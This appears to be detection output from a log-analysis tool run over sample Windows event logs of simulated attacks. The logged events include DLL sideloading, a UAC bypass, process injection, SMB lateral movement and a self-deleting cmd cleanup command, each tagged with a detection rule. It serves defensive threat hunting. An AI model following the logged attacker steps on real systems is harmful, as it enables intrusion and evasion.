+00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Internet Explorer\iexplore.exe"" | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\Public\tools\apt\tendyron.exe"" | LID: 0x8d824 | PID: 6392 | PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 13:17:02.738 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 13:17:02.764 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1452 | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 13:17:02.765 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1452 | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-17 11:38:58.613 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 11:43:27.499 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | Process: C:\Users\Public\tools\apt\wwlib\test.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xa0a10 | PID: 3660 | PGUID: 747F3D96-D8DF-5F8A-0000-0010572F7200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:27.499 +00:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:31.484 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | Process: C:\Users\Public\tools\apt\wwlib\test.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0xa09d1 | PID: 1256 | PGUID: 747F3D96-D8E3-5F8A-0000-001029A37200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:31.484 +00:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:31.484 +00:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation_sysmon/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:33.449 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Process: C:\Users\Public\tools\apt\wwlib\test.exe | PID: 1256 | PGUID: 747F3D96-D8E3-5F8A-0000-001029A37200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:33.449 +00:00,MSEDGEWIN10,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:33.476 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\wwlib.dll | Process: C:\Users\Public\tools\apt\wwlib\test.exe | PID: 1256 | PGUID: 747F3D96-D8E3-5F8A-0000-001029A37200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:33.495 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | LID: 0xa09d1 | PID: 2920 | PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:36.306 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 840 | PGUID: 747F3D96-D8E8-5F8A-0000-00102CEF7200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:36.306 +00:00,MSEDGEWIN10,1,high,Exec,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation_sysmon/proc_creation_win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:36.306 +00:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_sysmon/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:36.312 +00:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 840 | Tgt PGUID: 747F3D96-D8E8-5F8A-0000-00102CEF7200,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:40.902 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\explorer.exe"" | Process: C:\Windows\SysWOW64\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 6552 | PGUID: 747F3D96-D8EC-5F8A-0000-001094207300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:40.903 +00:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: C:\Windows\SysWOW64\explorer.exe | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 6552 | Tgt PGUID: 747F3D96-D8EC-5F8A-0000-001094207300,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:40.903 +00:00,MSEDGEWIN10,8,high,Evas | Exec,CACTUSTORCH Remote Thread Creation,,rules/sigma/create_remote_thread/sysmon_cactustorch.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:45.120 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Roaming\WINWORD.exe"" | Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 1576 | PGUID: 747F3D96-D8F1-5F8A-0000-00108B4B7300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:45.120 +00:00,MSEDGEWIN10,1,high,Exec,MS Office Product Spawning Exe in User Dir,,rules/sigma/process_creation_sysmon/proc_creation_win_office_spawn_exe_from_users_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:45.130 +00:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 1576 | Tgt PGUID: 747F3D96-D8F1-5F8A-0000-00108B4B7300,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:49.229 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c ping 127.0.0.1&&del del /F /Q /A:H ""C:\Users\IEUser\AppData\Roaming\wwlib.dll"" | Process: C:\Windows\SysWOW64\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 1680 | PGUID: 747F3D96-D8F5-5F8A-0000-00106B6F7300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:49.229 +00:00,MSEDGEWIN10,1,low,Evas,Windows Cmd Delete File,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_delete.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:49.229 +00:00,MSEDGEWIN10,1,high,Exec,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation_sysmon/proc_creation_win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:50:02.661 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{ACA8FE61-4C38-4216-A89C-9F88343DF21F}-GoogleUpdateSetup.exe | URL: http://r3---sn-5hnedn7z.gvt1.com/edgedl/release2/update2/HvaldRNSrX7_feOQD9wvGQ_1.3.36.32/GoogleUpdateSetup.exe?cms_redirect=yes&mh=Aq&mip=213.127.67.142&mm=28&mn=sn-5hnedn7z&ms=nvh&mt=1602935359&mv=m&mvi=3&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 12:32:08.987 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{8B60600B-E6B4-4083-99F3-D3A4CFB95796}-86.0.4240.75_85.0.4183.121_chrome_updater.exe | URL: http://r2---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/W_YanCvPLKRFNu-eN8kKOw_86.0.4240.75/86.0.4240.75_85.0.4183.121_chrome_updater.exe?cms_redirect=yes&mh=ps&mip=213.127.67.142&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1602937879&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 12:32:11.026 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 12:32:11.318 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 12:32:11.574 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0006/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 12:33:56.406 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 16:26:54.679 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\Intel\wwlib.dll | Process: C:\Windows\Explorer.EXE | PID: 3364 | PGUID: 747F3D96-19FB-5F8B-0000-0010DB270A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-17 16:27:08.081 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: calc.exe | Process: C:\Windows\SysWOW64\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\ProgramData\Intel\CV.exe"" | LID: 0x8faa7 | PID: 1536 | PGUID: 747F3D96-1B5C-5F8B-0000-001006AF2100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-17 16:27:08.734 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe"" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca | Process: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8faa7 | PID: 5912 | PGUID: 747F3D96-1B5C-5F8B-0000-0010A6E02100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-17 16:27:10.464 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | Process: C:\Windows\System32\RuntimeBroker.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8faa7 | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-17 16:27:10.787 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HCJVGQ5XQYJQFTRJAKRF.temp | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-17 16:27:10.791 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ff99ba2fb2e34b73.customDestinations-ms~RF6f668.TMP | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-17 22:37:52.809 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:52.892 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:52.956 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:52.991 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:53.047 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:53.111 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:53.169 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:53.230 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:53.417 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:53.527 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:53.571 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:53.664 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:53.771 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:53.807 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:53.867 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:53.928 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:52:31.218 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57238 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:52:34.249 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\7okjer.dll | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:52:34.966 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57239 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:01.646 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57240 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:04.161 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57241 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:04.924 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57242 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:05.436 